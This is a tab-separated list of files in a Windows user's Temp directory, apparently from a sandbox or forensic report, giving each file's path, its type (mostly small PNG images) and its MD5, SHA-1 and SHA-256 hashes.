C:\Users\user\AppData\Local\Temp\{6E3DE7B1-9BA7-456D-BF90-CE424E8C19B6}	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced	817D5A35EDB2B0E052194D4F49FDA19C	FA6CB2016C5F43B76102B63D60359139227E07EA	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
C:\Users\user\AppData\Local\Temp\{70BF80DF-3D5F-4D88-96EF-54CC2731F972}.bin	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Temp\{72927BDE-CC4B-44CB-8968-221AC03D3C39}.bin	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced	830632032C7DDBCCDE126F4BAE935540	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
C:\Users\user\AppData\Local\Temp\{72AB6C91-896E-471B-ABC0-29FCF8FE0903}.bin	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Temp\{74C535CB-BA50-4B7F-B394-543854CAB85D}.bin	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced	E88131C9AAC52649FF044905ACAB9B76	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
C:\Users\user\AppData\Local\Temp\{75FC24AE-FA4D-45F7-9E1C-78C330E876AA}	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced	91CB7F1273AA003076401081B8A22237	5157144069E7D2FDAE60B397BE5851E75BDF7707	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
C:\Users\user\AppData\Local\Temp\{76CB4CB5-C05B-4719-A520-DC64982444FE}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
C:\Users\user\AppData\Local\Temp\{7FEE891F-F757-43E9-95EB-33E61F52EAA6}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	31579CA3352DF8FA4E3E7F48C7CDF672	AA682A3C781BF8EE43B5EDC9718E64CB79135F25	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
C:\Users\user\AppData\Local\Temp\{818DD083-FBDC-40F9-98EA-F25C71604FC5}.bin	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Temp\{83203535-F5CE-4285-8307-77B5C31C5FA6}.bin	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced	7F161B19B937AB48D4FD2F6E5E16FDBD	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
C:\Users\user\AppData\Local\Temp\{83F21CF8-471C-4F66-8664-7CC73738CFBC}	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Temp\{86650956-1396-486F-85F5-3A56329C9716}.bin	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Temp\{871E0D58-08D4-4339-8C20-658D87460E97}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	31579CA3352DF8FA4E3E7F48C7CDF672	AA682A3C781BF8EE43B5EDC9718E64CB79135F25	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
C:\Users\user\AppData\Local\Temp\{8967BA46-B370-451A-8CEF-1613067796B5}.bin	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Temp\{89F2A1AB-B17B-4719-B59F-45F55C0ED4F7}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{8D8EC411-99E8-48E6-ADBA-594667D62ABA}	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced	548D234C9AB4021CA5FAB7BF22502465	2F7495D250DC86EA99473CC342D164B859926021	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
C:\Users\user\AppData\Local\Temp\{8E0E3D61-6878-4E2E-A443-7B33EB366DD0}	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Temp\{924AF9BE-1999-4E54-8BE9-050A0421CAF3}.bin	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Temp\{93885A54-8B09-4F11-8175-6110ECBC26B4}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	708E8EB906BC105CCA0535AE669AA651	38D82DEDFE97D3001188C2E18FE13BD741FD520F	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
C:\Users\user\AppData\Local\Temp\{9631D0C7-D35A-4006-80B8-4A6E31C535B2}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	31579CA3352DF8FA4E3E7F48C7CDF672	AA682A3C781BF8EE43B5EDC9718E64CB79135F25	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
C:\Users\user\AppData\Local\Temp\{96CB5ADE-2EC4-4B57-92B3-A1B95C828887}.bin	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Temp\{99AF8CF4-D36D-4866-AA8C-05735BC1C9EB}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
C:\Users\user\AppData\Local\Temp\{99CCE4A0-385E-4890-AE48-41C445FBA682}	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Temp\{9A7CE641-13D8-4994-B0CA-286F36739626}	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Temp\{9AC8A009-2CEA-4D7D-8DF7-DE756847AFC8}	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Temp\{9AEA1C62-7B7D-404F-AFCB-FB093F02BC23}.bin	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Temp\{9B084582-4890-4303-B7CD-E4F5D128FADB}.bin	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced	29B87BEEC5D3899824AA390530CD47FB	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
C:\Users\user\AppData\Local\Temp\{9C341BBF-A93E-4309-B590-DACBD6D13299}	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced	830632032C7DDBCCDE126F4BAE935540	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
C:\Users\user\AppData\Local\Temp\{9C8B0398-CE20-4CBE-B0C1-7499DD8A7DF2}	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced	E88131C9AAC52649FF044905ACAB9B76	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
C:\Users\user\AppData\Local\Temp\{9EEE4ABA-A596-4639-889F-712CD64F7BCE}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Temp\{9F71642F-04CF-4DAE-B6F5-17AA24616C3B}.bin	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced	830632032C7DDBCCDE126F4BAE935540	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
C:\Users\user\AppData\Local\Temp\{9F80252E-A71F-4B7E-AB8C-51CC2878DD32}.bin	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Temp\{A0D60D5C-D7DE-4E5F-98A0-9484893279AA}	ASCII text, with very long lines (372), with no line terminators	7B496ED05993DC9E0510941660F450B1	1D05D4A1D54D9DB7E0636D2462A2AD4F6136E57D	A2D81D7963DEBAB5291457FBA18E7E46D716C1271E32B5B5125441BED3D5573D
C:\Users\user\AppData\Local\Temp\{A0F20B21-0D6D-480A-B950-A174DFAFEB22}	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Temp\{A8C0D073-1204-4E0D-97F0-6BBC44EF7282}.bin	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced	EF9AA5B2ADBE5DF68AC4F4D716DF7708	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
C:\Users\user\AppData\Local\Temp\{A8CEB3B3-53F2-4A14-B3E3-951914E6E7F5}	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced	817D5A35EDB2B0E052194D4F49FDA19C	FA6CB2016C5F43B76102B63D60359139227E07EA	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
C:\Users\user\AppData\Local\Temp\{A96AAEEA-BC15-4631-BCBA-81C3F4584AEB}.bin	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced	817D5A35EDB2B0E052194D4F49FDA19C	FA6CB2016C5F43B76102B63D60359139227E07EA	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
C:\Users\user\AppData\Local\Temp\{ABAD0A8C-4F04-4D89-A9AF-AAA1C7D3E388}.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Temp\{AEE092A0-BFB4-49AF-89D0-F2154DBA479A}	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced	7F161B19B937AB48D4FD2F6E5E16FDBD	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
C:\Users\user\AppData\Local\Temp\{AFEC24F9-6178-4E4C-8D3E-6CE97C7EABC5}	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced	EF9AA5B2ADBE5DF68AC4F4D716DF7708	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
C:\Users\user\AppData\Local\Temp\{B04438C1-CEB7-4197-91A1-D10164D89C6D}.bin	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Temp\{B0E724BB-75A7-4227-89CF-8B794D4AEF20}.bin	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Temp\{B8A26195-F9C1-4652-9F0E-B091C6A4DF0B}	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Temp\{B8D86819-BFCA-4C5B-B365-53BCFE86C42A}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Temp\{B9563878-82F5-44C1-9813-AB1F782914D1}	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Temp\{BA54430A-DB9B-4BA0-8B71-6235892D496C}	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Temp\{BA5EE99F-8C9D-4567-997B-6A096E0B9A4E}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{BAAA38D3-4793-4D52-A749-E555EA4468F7}	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Temp\{BB936535-45C5-4061-873D-06D521896D4C}.bin	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Local\Temp\{BBB50089-D536-4269-A715-A9F655C662A3}	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Temp\{BD7894B7-7C67-4EBC-8E6A-16E3204DE88D}	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
C:\Users\user\AppData\Local\Temp\{C37CB9B2-25F8-463E-BA11-6A95481D6BA7}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Temp\{C496AB18-8746-4AD0-88B1-133E84254A94}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{C73302CD-A010-499C-86B5-5198E61E8D7F}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	163E6791C87E4999C343EC5E23843B15	43CE3BAE19E22876483A7FD0E93DB45790373600	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
C:\Users\user\AppData\Local\Temp\{C983F922-2F27-4C14-9DFE-DD35917DC9CC}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Temp\{CB2AB54C-A297-41D7-81E1-2757972E07DE}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{CB54C77B-0214-42D5-AB85-3A393DC63EF3}	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
C:\Users\user\AppData\Local\Temp\{CBABFDE1-6BBE-43FD-BA47-E39F5076E19C}.bin	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Temp\{CCD18F24-4AC6-40EA-B992-FC3C0FAE60CA}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
C:\Users\user\AppData\Local\Temp\{D308D389-B65C-4791-9FE6-4A774F84B21B}	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Temp\{D88B87E7-FAA9-4FC8-9E12-A7A3CEBC4506}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{D94710B0-069B-4BDC-838C-063CE0655F09}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{DDD5D422-ABC1-47FD-AF28-F7A792E1DC28}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{DEDEEA04-619C-4020-9769-7DE0CD14B160}	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Temp\{E8D1F82C-4A0B-4003-A21F-3EE7CD266809}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{E9319BF7-E9E7-44AC-8EB5-3C0F312FAA30}	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Temp\{EB5EC939-AF65-4B82-A15C-E8448EB7CF19}	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced	E88131C9AAC52649FF044905ACAB9B76	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
C:\Users\user\AppData\Local\Temp\{EB65E805-D393-42D2-973F-27B805513FA7}.bin	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Temp\{EBE37427-A208-4DD1-95D0-0F47DE7E5B43}	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Temp\{ED55F159-68F5-4966-B560-1E7FE8BFD1F8}.bin	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
C:\Users\user\AppData\Local\Temp\{EDDCBD3A-B136-4E2C-B697-CF22AC4579C2}	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced	EF9AA5B2ADBE5DF68AC4F4D716DF7708	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
C:\Users\user\AppData\Local\Temp\{EEDB1528-5280-4554-A684-B515CB7987DD}.bin	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced	EF9AA5B2ADBE5DF68AC4F4D716DF7708	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
C:\Users\user\AppData\Local\Temp\{EEFB8C19-B408-462C-A17E-C7DBFADA5015}	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced	91CB7F1273AA003076401081B8A22237	5157144069E7D2FDAE60B397BE5851E75BDF7707	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
C:\Users\user\AppData\Local\Temp\{F36F0537-9D20-4390-9EC6-2D1AA2CC9790}.bin	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Temp\{F66BEA49-4A57-4978-8A2C-8E1302D6AF82}	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced	29B87BEEC5D3899824AA390530CD47FB	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
C:\Users\user\AppData\Local\Temp\{F738F501-17B9-462B-B111-43A39B2ECBEA}	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Temp\{F778F4F7-1BFE-4B7F-8503-410F443F91FC}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{F794AD99-3F51-417C-BFCB-7C924053727A}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Temp\{F8834DE5-0E6E-490C-ACD6-23D1F81133D7}.bin	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Temp\{F924DE40-D7C5-4099-A702-9ED9FAE8AC12}	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Temp\{F9753E7D-73AC-4CAF-9E39-A0E088FC3E53}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{FAA44344-2C3E-496E-994B-4AF6853B02FA}.bin	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Temp\{FB2EE13B-F817-4FC6-B2E2-D84FD8BC051C}	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Temp\{FB337C79-11CC-4E37-89F4-15AA6C1F0230}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
